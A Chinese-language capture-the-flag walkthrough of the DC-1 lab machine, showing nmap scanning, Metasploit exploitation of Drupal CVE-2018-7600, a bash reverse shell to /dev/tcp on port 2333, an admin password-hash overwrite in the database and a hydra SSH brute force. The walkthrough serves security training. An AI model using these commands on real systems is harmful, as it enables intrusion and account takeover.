网络安全之DC-1靶机渗透实验

一、下载DC-1靶机虚拟机镜像文件,导入VM虚拟机

bash 复制代码
https://pan.baidu.com/s/1B1IbAgA8vD9-cZ_mdZy9wA?pwd=qwui

二、设置DC-1的网卡模式为NAT模式,记录其MAC地址

三、在kali系统中利用nmap工具扫描本网段主机信息

bash 复制代码
# nmap -sP 192.168.2.0/24 -oN nmap.sP

由图可知靶机获取到的地址是192.168.2.7

利用获取到的IP地址,进一步对其端口扫描

bash 复制代码
# nmap -A 192.168.2.7 -p 1-65535 -oN nmap.A

发现靶机开放22端口(可以爆破)和80端口,在80端口下,可以看到其网站的模板为:Drupal 7(国外三大PHP CMS之一,drual、wordpress、joomla)。

我们先访问一下靶机的80端口

接下来通过使用MSF直接搜索该网站模板存在的漏洞

bash 复制代码
启动msf
# msfconsole 
bash 复制代码
msf6 > search drupal

通过查看References来查看该漏洞的详细信息

bash 复制代码
 https://cvedetails.com/cve/CVE-2018-7600/

选择攻击载荷

bash 复制代码
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2  选择模块
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp 设置攻击载荷

缺少目标地址

bash 复制代码
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.2.7
bash 复制代码
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

成功拿到shell

flag1

Every good CMS needs a config file - and so do you.这句话指引应该去找的该网站的配置文件所在目录:sites/default/

flag2

bash 复制代码
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',     

接下来进入交互界面,进一步获取信息

根据获取到的信息尝试连接数据库

bash 复制代码
mysql -udbuser -pR0ck3t  #连接失败,考虑使用反弹shell

kali机本地监听2333端口

直接反弹失败

使用python反弹

bash 复制代码
meterpreter > shell
Process 3791 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ 
bash 复制代码
www-data@DC-1:/var/www$ bash -i >& /dev/tcp/192.168.2.10/2333 0>&1

反弹成功

进入数据库drupladb,查询users数据表

bash 复制代码
mysql> use drupaldb
mysql> select * from users\G

重置后台管理员admin用户密码,由于破解admin 用户密码要耗费一定时间,我这里考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

bash 复制代码
www-data@DC-1:/var/www$ php scripts/password-hash.sh admin

更新users表

bash 复制代码
mysql> update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

更新成功,管理员admin的密码已经更改为admin

flag3

使用新密码登录后台

按照提示找到/etc/passwd

flag4

由图可知flag4用户可以登录

使用hydra进行爆破flag4用户密码,在kali系统中执行

bash 复制代码
# hydra -l flag4 -P /usr/share/john/password.lst 192.168.2.7 ssh -vV -f -o hydra.ssh



检查一下是否有一些命令具有SUID 标志

利用操作系统内核提权

成功获取root权限

相关推荐
百***787517 分钟前
gpt-image-1.5极速接入指南:3步上手+图像核心能力解析+避坑手册
android·java·gpt
智驱力人工智能20 分钟前
无人机河道漂浮物检测 从项目构建到价值闭环的系统工程 无人机河道垃圾识别 农村河道漂浮物智能清理方案 无人机辅助河道清洁预警
opencv·算法·安全·yolo·目标检测·无人机·边缘计算
撩得Android一次心动30 分钟前
Android 四大组件——Service(服务)【基础篇2】
android·java·服务·四大组件·android 四大组件
是垚不是土1 小时前
MySQL8.0数据库GTID主从同步方案
android·网络·数据库·安全·adb
cnxy1881 小时前
MySQL地理空间数据完整使用指南
android·数据库·mysql
Ancelin安心1 小时前
关于代理的一些网络知识复盘
linux·运维·网络·计算机网络·web安全·ubuntu·网络安全
缘友一世1 小时前
现代密码学【3】之密码学形式化分析与可证明安全基础
安全·密码学·概率论
重生之我在番茄自学网安拯救世界1 小时前
网络安全中级阶段学习笔记(十一):服务器解析漏洞全解析(原理、利用与防御)
运维·服务器·web安全·网络安全·渗透测试·服务器解析漏洞
Digitally1 小时前
4种方法在电脑上查看安卓短信
android·电脑
_李小白1 小时前
【Android FrameWork】第四十天:SamplingProfilerService
android